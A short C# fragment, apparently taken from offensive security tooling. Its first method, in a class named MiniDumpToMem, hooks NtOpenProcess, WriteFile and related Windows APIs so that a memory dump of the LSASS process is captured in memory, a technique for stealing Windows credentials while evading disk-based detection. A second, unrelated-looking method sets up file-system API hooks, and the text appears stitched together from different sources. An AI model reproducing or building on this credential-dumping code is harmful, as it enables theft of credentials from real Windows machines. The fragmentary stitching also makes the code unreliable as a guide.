internal static void InitHookEngine(IntPtr contextHandle, uint dumpSizeLimit, int lsassPid, IntPtr lsassHandle)
{
hookEngine = new HookEngine();
dumpContexts[contextHandle] = new DumpContext(dumpSizeLimit);
MiniDumpToMem.lsassPid = lsassPid;
MiniDumpToMem.lsassHandle = lsassHandle;
SetFilePointer_detour = new SetFilePointerDelegate(SetFilePointer);
GetFileSize_detour = new GetFileSizeDelegate(GetFileSize);
WriteFile_detour = new WriteFileDelegate(WriteFile);
NtOpenProcess_detour = new NtOpenProcessDelegate(NtOpenProcess);
NtOpenProcess_orig = hookEngine.CreateHook("ntdll.dll", "NtOpenProcess", NtOpenProcess_detour);
SetFilePointer_orig = hookEngine.CreateHook("kernelbase.dll", "SetFilePointer", SetFilePointer_detour);
GetFileSize_orig = hookEngine.CreateHook("kernelbase.dll", "GetFileSize", GetFileSize_detour);
WriteFile_orig = hookEngine.CreateHook("kernelbase.dll", "WriteFile", WriteFile_detour);
hookEngine.EnableHooks();
}
private void InitializeDelegates()
{
_createFileDelegate = new CreateFileADelegate(CreateFileHook);
_createDirectoryDelegate = new CreateDirectoryDelegate(CreateDirectoryHook);
_deleteFileDelegate = new DeleteFileDelegate(DeleteFileHook);
_removeDirectoryDelegate = new RemoveDirectoryDelegate(RemoveDirectoryHook);
_moveFileDelegate = new MoveFileDelegate(MoveFileHook);
_readFileDelegate = new ReadFileDelegate(ReadFileHook);
_closeHandleDelegate = new CloseHandleDelegate(CloseHandleHook);
_getFileAttributesDelegate = new GetFileAttributesDelegate(GetFileAttributesHook);
_getFileTypeDelegate = new GetFileTypeDelegate(GetFileTypeHook);
_setFilePointerDelegate = new SetFilePointerDelegate(SetFilePointerHook);
_getFileInformationByHandleDelegate = new GetFileInformationByHandleDelegate(GetFileInformationByHandleHook);
_setEndOfFileDelegate = new SetEndOfFileDelegate(SetEndOfFileHook);
_findFirstFile = new FindFirstFile(FindFirstFileHook);
_findNextFile = new FindNextFile(FindNextFileHook);
_findClose = new FindClose(FindCloseHook);
_tioPathAdd = new TioPathAdd(TioPathAddHook);
}
